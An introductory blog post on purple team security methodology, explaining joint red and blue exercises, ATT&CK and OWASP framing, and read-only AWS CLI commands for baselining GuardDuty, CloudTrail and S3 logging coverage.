  • Purple team security is the practice of combining offensive (red) and defensive (blue) work in the same exercise — attackers simulate real techniques while defenders tune detection in real time
  • Traditional red team engagements produce a report; purple team produces a faster MTTD (mean time to detect)
  • The structural output is not a findings list — it’s updated detection rules, tested playbooks, and a measured detection baseline
  • Purple team is not a permanent headcount; it is a cadence of exercises run against your own infrastructure
  • Every episode in this series follows the red-blue-purple model: attack simulation → detection → structural fix

OWASP Mapping: This episode establishes the series methodology. No single OWASP category. Subsequent episodes map directly to A01 through A10.


The Big Picture

┌─────────────────────────────────────────────────────────────────┐
│                    PURPLE TEAM MODEL                            │
│                                                                 │
│   RED TEAM                    BLUE TEAM                         │
│   (Offensive)                 (Defensive)                       │
│                                                                 │
│   ┌──────────┐               ┌──────────┐                       │
│   │ Simulate │──── attack ──▶│  Detect  │                       │
│   │ attack   │               │  alert   │                       │
│   └──────────┘               └──────────┘                       │
│         │                          │                            │
│         └──────────┬───────────────┘                            │
│                    │                                            │
│              ┌─────▼──────┐                                     │
│              │  DEBRIEF   │  ← The purple layer                 │
│              │ What fired?│                                      │
│              │ What didn't│                                      │
│              │ Why?       │                                      │
│              └─────┬──────┘                                     │
│                    │                                            │
│         ┌──────────▼──────────┐                                 │
│         │  Updated detection  │                                 │
│         │  rules + playbooks  │                                 │
│         └─────────────────────┘                                 │
│                                                                 │
│   OUTCOME: Detection time drops exercise-over-exercise          │
└─────────────────────────────────────────────────────────────────┘

What is purple team security? It is the structured practice of attacking your own infrastructure — with full visibility on both sides — so that detection logic improves after every exercise, not just after a real breach.


Why Red vs. Blue Alone Fails

Eleven days.

That was how long an attacker had access before my blue team detected the compromise in a red team engagement I ran two years ago. It was a standard authorized engagement — well-scoped, realistic techniques, no shortcuts. The red team was good. The blue team was experienced. And still: eleven days.

The debrief was the turning point. The red team had used techniques that generated logs — CloudTrail entries, VPC Flow Log anomalies, process spawn events. The blue team had the data. The detections just weren’t tuned for these specific patterns. Nobody had ever run the techniques against this specific environment and verified whether the alerts fired.

We restructured the next exercise as a purple team exercise. Same attacker techniques. But this time, the blue team was in the room with the red team. They watched each technique execute in real time. They checked whether the alert fired. When it didn’t, they wrote the detection rule on the spot and verified it before moving to the next technique.

Detection time in the following exercise: four hours.

That is the entire argument for purple team security. Not philosophy. Not org charts. Eleven days versus four hours.


What Red Team Alone Gets Wrong

Traditional red team engagements produce a report with findings. The findings describe what the attacker did. The recommendations describe what to fix. Then the report goes to a remediation queue, the org closes the tickets over three months, and the detection logic is never tested.

The fundamental problem: a red team report tells you what happened; it doesn’t tell you whether your detection would catch it happening again.

The MITRE ATT&CK framework lists over 400 techniques. An annual red team engagement tests maybe 20 of them against your environment. You get a PDF. You don’t get a detection baseline.

Red team alone also creates adversarial dynamics inside the organization. Red team wins when they’re not caught. Blue team wins when they catch everything. These goals are structurally opposed, which means neither team has an incentive to share information that would help the other.


What Blue Team Alone Gets Wrong

Blue team without red team input is writing detection rules in the abstract. They tune alerts based on what they think an attacker would do, not what an attacker actually does against your specific environment with your specific tooling.

Signature-based detection catches known-bad. Behavioral detection catches anomalies. Neither catches a sophisticated attacker who has studied your baseline — unless you’ve explicitly tested whether the behavior that attacker uses registers as an anomaly in your environment.

Blue teams also tend toward alert fatigue. When everything fires, nothing gets investigated. Tuning requires knowing which signals correspond to real techniques, and that knowledge only comes from running the techniques.


The Purple Team Model: How It Actually Works

Purple team security is not a permanent team structure. You don’t hire a purple team. You run purple team exercises.

The exercise structure:

1. SCOPE          — agree on the attack scenario (e.g., "compromised developer credentials")
2. RED EXECUTES   — red team runs the first technique in the scenario
3. BLUE OBSERVES  — blue team watches for the alert; records: fired / not fired / noisy
4. DEBRIEF        — immediate, technique by technique. Why didn't it fire? What data existed?
5. TUNE           — blue team updates detection rule. Red team re-runs. Verify it fires.
6. NEXT TECHNIQUE — repeat for every technique in the scenario
7. MEASURE        — record detection rate and detection time at the end of the exercise

The output of a purple team exercise is not a PDF. It is:
– Updated detection rules (tested and verified)
– A measured detection time for each technique
– A documented attack scenario with the specific commands used
– A baseline for the next exercise to beat

This is what “purple” means: the red and blue work together, in the same room or on the same call, producing improved defense as a direct output of the attack simulation.


The MITRE ATT&CK Scaffolding

Every purple team exercise is anchored to ATT&CK techniques. ATT&CK provides the shared vocabulary: red team uses technique T1078 (Valid Accounts), blue team knows which data sources detect T1078, and the exercise verifies whether those detections are actually implemented and tuned.

MITRE ATT&CK Technique
         │
         ├── Tactic: Initial Access / Persistence / Lateral Movement / ...
         ├── Data Sources: CloudTrail, Process events, Network traffic, ...
         ├── Detection: What behavioral indicator to look for
         └── Mitigations: What configuration change prevents or limits it

When you scope a purple team exercise using ATT&CK, you get explicit coverage tracking. After six exercises, you can report: “We have verified detections for 47 of the 112 techniques most relevant to our threat model. These 65 are not yet covered.”

That is a measurable security posture improvement. It is auditable. It is repeatable.


Where OWASP Fits in This Series

This series uses OWASP Top 10 (2021) as the threat taxonomy, not ATT&CK. The reason: OWASP Top 10 maps directly to the classes of vulnerability that caused the major breaches between 2020 and 2025 — and it is familiar to the developers and architects who need to remediate them.

The next episode maps every OWASP Top 10 category to its cloud and Kubernetes infrastructure equivalent. Most engineers think OWASP applies only to web applications. It doesn’t. Broken Access Control (A01) is the S3 bucket that’s public when it shouldn’t be. Cryptographic Failures (A02) is the environment variable with a plaintext database password committed to GitHub. Injection (A03) is the SSRF that hits the EC2 metadata endpoint.

The framing shifts. The categories don’t.


Red Phase Primer: How Attack Simulations Work in This Series

Every episode from EP04 onward follows this structure:

Red phase — the technique the attacker uses, with the actual commands. Not “the attacker exploited misconfigured IAM.” The actual aws CLI command or kubectl invocation that demonstrates the technique. Commands are safe for authorized use in your own environment or a test account.

Blue phase — what detection looks like. The CloudTrail event, the GuardDuty finding, the Falco rule, the SIEM query. If it doesn’t fire by default, the episode says so explicitly — and shows you how to make it fire.

Purple phase — the structural fix. Not “train your developers to be more careful.” The IAM policy, the SCPs, the network control, the pre-commit hook. The thing that makes the vulnerability not exist, not the thing that makes humans try harder to avoid it.


Run This in Your Own Environment: Baseline Your Current Detection Coverage

Before EP02, establish a detection baseline. This tells you where you start, so later exercises have a number to beat.

aws guardduty list-findings \
  --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
  --finding-criteria '{
    "Criterion": {
      "updatedAt": {
        "GreaterThanOrEqual": '$(date -d '30 days ago' +%s000)'
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 50 aws guardduty get-findings \
    --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, severity: .Severity, count: 1}' | \
  jq -s 'group_by(.type) | map({type: .[0].type, count: length})'
# Check if CloudTrail is enabled and logging management events
aws cloudtrail describe-trails --query 'trailList[].{Name:Name,MultiRegion:IsMultiRegionTrail,LoggingEnabled:HasCustomEventSelectors}' --output table
# Check if S3 server access logging is enabled on all buckets
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    logging=$(aws s3api get-bucket-logging --bucket "$bucket" 2>/dev/null)
    if [ -z "$logging" ] || echo "$logging" | grep -q '{}'; then
      echo "NO LOGGING: $bucket"
    else
      echo "LOGGING OK: $bucket"
    fi
  done

Record your current findings count by category and the number of buckets without logging. These are your pre-exercise baselines.


⚠ Common Mistakes When Starting a Purple Team Practice

Running it as an annual event. One purple team exercise per year produces a report. Monthly exercises with 3–5 techniques each produce measurable improvement in detection time. Frequency is the variable.

Letting red and blue work in separate rooms. The purple layer is the debrief. If red sends a report and blue reads it later, you’ve just done a red team engagement. The real-time shared observation is what generates the immediate detection improvement.

Measuring success as “how many vulnerabilities were found.” The right metric is detection time per technique and detection coverage across your ATT&CK or OWASP matrix. Vulnerabilities found is an output of the exercise; faster detection is the outcome.

Starting with sophisticated techniques. The first exercise should test basics: credential access, S3 enumeration, IAM privilege escalation attempts. These generate straightforward logs in CloudTrail. If your detection doesn’t catch these, it won’t catch the sophisticated stuff either. Start where the coverage gaps are most embarrassing.

No documentation of the exercise environment state. If you tune a detection rule during an exercise and then a Terraform change overwrites the policy, you’ve lost the improvement. All detection changes from exercises go through version control immediately.


Quick Reference

Term Definition
Purple team security Practice of combined red/blue exercises where both teams improve detection together
MTTD Mean Time to Detect — the primary metric purple team exercises reduce
ATT&CK MITRE framework mapping adversary techniques to data sources and detections
Red phase Attacker perspective: simulate the technique with real commands
Blue phase Defender perspective: what detection fires (or doesn’t)
Purple phase The joint debrief and immediate detection tuning that makes both better
Detection baseline Measured MTTD and technique coverage before the first exercise
OWASP Top 10 Threat taxonomy used in this series — applies to infrastructure, not just web apps

Key Takeaways

  • Purple team security is a practice, not a team: structured exercises where red attacks and blue detects in real time, with joint debrief producing updated detection rules
  • The metric that matters is detection time per technique — not findings count
  • Red team alone produces a report; purple team produces a faster MTTD and tested detection coverage
  • MITRE ATT&CK provides the technique vocabulary; OWASP Top 10 provides the vulnerability taxonomy this series uses
  • Every major cloud breach 2020–2025 maps to an OWASP category — those categories are the exercise backlog for any cloud-running organization
  • Detection improvements from exercises must be version-controlled immediately or they disappear with the next infrastructure change
  • Frequency of exercises is the primary driver of improvement — monthly beats annual by an order of magnitude

What’s Next

EP02 maps every OWASP Top 10 category to its cloud infrastructure equivalent. Most engineers treat OWASP as a web application concern. The cloud security breaches from 2020 to 2025 tell a different story: the S3 bucket that became public is A01; the CI/CD pipeline secret is A08; the SSRF to EC2 metadata is A10. The taxonomy was always infrastructure-applicable. EP02 makes that mapping explicit — with the cloud-native equivalent, the real breach that demonstrates it, and the detection query to run.

Get EP02 in your inbox when it publishes → subscribe at linuxcent.com